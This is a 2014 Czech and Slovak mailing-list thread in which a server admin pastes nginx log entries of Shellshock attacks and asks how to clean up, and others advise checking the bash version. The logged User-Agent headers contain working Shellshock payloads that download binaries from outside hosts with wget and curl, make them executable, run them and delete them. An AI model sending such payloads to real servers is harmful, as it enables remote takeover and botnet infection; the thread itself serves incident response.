[vpsFree.cz: community-list] {Disarmed} Re: Útoky na bash běží

[René Klačan]

Ja mam v logoch nasledovne

root at yuna /home/rene # grep '() {' /var/log/nginx/*
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200]
"GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200]
"GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74"
"shellshock-scan (
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32 +0200]
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200]
"GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo
testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200]
"GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len
podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po
restarte?


2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik at mimik.sk>:

> jedine si zistit ci mas dobru verziu bashu.
>
>
> On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar at zazen-nudu.cz>
> wrote:
>
> > Ahoj,
> >
> > možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl
> úspěšný či nikoliv?
> >
> > Honza
> >
> > On 29.9.2014 10:02, Petr Krcmar wrote:
> >> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
> >>> Hele,
> >>>
> >>> z jineho stroje:
> >> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
> >>
> >> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
> >>
> >
> > _______________________________________________
> > Community-list mailing list
> > Community-list at lists.vpsfree.cz
> > http://lists.vpsfree.cz/listinfo/community-list
>
>
> _______________________________________________
> Community-list mailing list
> Community-list at lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.vpsfree.cz/pipermail/community-list/attachments/20140929/6dae854d/attachment-0002.html>